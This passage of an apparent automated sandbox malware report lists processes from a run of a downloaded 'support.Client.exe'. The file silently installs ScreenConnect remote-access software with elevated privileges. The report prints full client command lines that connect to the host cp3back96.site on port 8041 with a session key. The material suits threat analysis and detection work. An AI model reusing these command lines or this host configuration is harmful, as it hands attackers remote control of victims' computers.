                                                                                                                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3360 --field-trial-handle=1956,i,12778889090336067455,703406671093003371,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                              Imagebase:0x7ff7f9810000
                                                                                                                                                                              File size:3'242'272 bytes
                                                                                                                                                                              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:13
                                                                                                                                                                              Start time:14:34:27
                                                                                                                                                                              Start date:29/10/2024
                                                                                                                                                                              Path:C:\Users\user\Downloads\support.Client.exe
                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                              Commandline:"C:\Users\user\Downloads\support.Client.exe"
                                                                                                                                                                              Imagebase:0x250000
                                                                                                                                                                              File size:86'304 bytes
                                                                                                                                                                              MD5 hash:7B959C1EA179AF2DFC447BF8DB1E2C26
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:14
                                                                                                                                                                              Start time:14:34:28
                                                                                                                                                                              Start date:29/10/2024
                                                                                                                                                                              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
                                                                                                                                                                              Imagebase:0x212a13e0000
                                                                                                                                                                              File size:24'856 bytes
                                                                                                                                                                              MD5 hash:B4088F44B80D363902E11F897A7BAC09
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:15
                                                                                                                                                                              Start time:14:35:14
                                                                                                                                                                              Start date:29/10/2024
                                                                                                                                                                              Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:"C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                                                                                                                                                                              Imagebase:0x7ff6b0f20000
                                                                                                                                                                              File size:468'120 bytes
                                                                                                                                                                              MD5 hash:B3676839B2EE96983F9ED735CD044159
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:16
                                                                                                                                                                              Start time:14:35:14
                                                                                                                                                                              Start date:29/10/2024
                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                              Imagebase:0x7ff6684c0000
                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:17
                                                                                                                                                                              Start time:14:35:19
                                                                                                                                                                              Start date:29/10/2024
Path:C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exe
Wow64 process (32bit):false
Commandline:"C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exe"
Imagebase:0x780000
File size:587'040 bytes
MD5 hash:5DEC65C4047DE914C78816B8663E3602
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000011.00000000.1931309778.0000000000782000.00000002.00000001.01000000.0000000C.sdmp, Author: Joe Security
Reputation:low
Has exited:true

Target ID:18
Start time:14:35:20
Start date:29/10/2024
Path:C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=cp3back96.site&p=8041&s=5999b697-2fc8-47f6-a1dc-4d0d274c363e&k=BgIAAACkAABSU0ExAAgAAAEAAQB9zMUOcnsRaC12buOM5jB%2f0aQdWfMpUKDaWi13yRXoM16W00nLl4p0ZtEhANoxvmcw0wWFEBncKj1h1Sizr06d2epn5Y1la%2fZuAUNQxVB6zV6MkV%2fQ3PQ8O4IKEUzM%2b1uTT6bVi8cjhVOM7wlYYJcudQAB6Dwlh4JaUc5YEBvhT8MaZnAIYPqnbmxNwUw1RDlaRh5YJbZGPTJPIJpusdEO4D%2fCUtP6CZ%2f6LBYCi1k6apr4NFJdoCsgYMmz0ueWApW6fnSWePa0E3G6vxJQsjXUZXU7nn2pC9y84o5L0uqvKTZ239UPNomZv8wnSyaubzULL%2b48fuhT%2fYi9ukTBmorR&r=&i=Untitled%20Session" "1"
Imagebase:0x7f0000
File size:95'520 bytes
MD5 hash:DC615E9D8EC81CBF2E2452516373E5A0
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low
Has exited:true

Target ID:19
Start time:14:35:20
Start date:29/10/2024
Path:C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=cp3back96.site&p=8041&s=5999b697-2fc8-47f6-a1dc-4d0d274c363e&k=BgIAAACkAABSU0ExAAgAAAEAAQB9zMUOcnsRaC12buOM5jB%2f0aQdWfMpUKDaWi13yRXoM16W00nLl4p0ZtEhANoxvmcw0wWFEBncKj1h1Sizr06d2epn5Y1la%2fZuAUNQxVB6zV6MkV%2fQ3PQ8O4IKEUzM%2b1uTT6bVi8cjhVOM7wlYYJcudQAB6Dwlh4JaUc5YEBvhT8MaZnAIYPqnbmxNwUw1RDlaRh5YJbZGPTJPIJpusdEO4D%2fCUtP6CZ%2f6LBYCi1k6apr4NFJdoCsgYMmz0ueWApW6fnSWePa0E3G6vxJQsjXUZXU7nn2pC9y84o5L0uqvKTZ239UPNomZv8wnSyaubzULL%2b48fuhT%2fYi9ukTBmorR&r=&i=Untitled%20Session" "1"
Imagebase:0x7f0000
File size:95'520 bytes
MD5 hash:DC615E9D8EC81CBF2E2452516373E5A0
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low
Has exited:false

Target ID:20
Start time:14:35:22
Start date:29/10/2024
Path:C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exe
Wow64 process (32bit):false
Commandline:"C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exe" "RunRole" "286148cd-317c-42bd-b1b6-847f55f60348" "User"
Imagebase:0xca0000
File size:587'040 bytes
MD5 hash:5DEC65C4047DE914C78816B8663E3602
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:low
Has exited:false

Target ID:21
Start time:14:35:24
Start date:29/10/2024
Path:C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exe
Wow64 process (32bit):false
Commandline:"C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exe" "RunRole" "dab60135-edfb-4837-8e58-b67bfb3544e3" "System"
Imagebase:0x5b0000
File size:587'040 bytes
MD5 hash:5DEC65C4047DE914C78816B8663E3602
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low
Has exited:true

Target ID:24
Start time:14:35:50
Start date:29/10/2024
Path:C:\Windows\System32\rundll32.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Imagebase:0x7ff65d420000
File size:71'680 bytes
MD5 hash:EF3179D498793BF4234F708D3BE28633
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:low
Has exited:true

No disassembly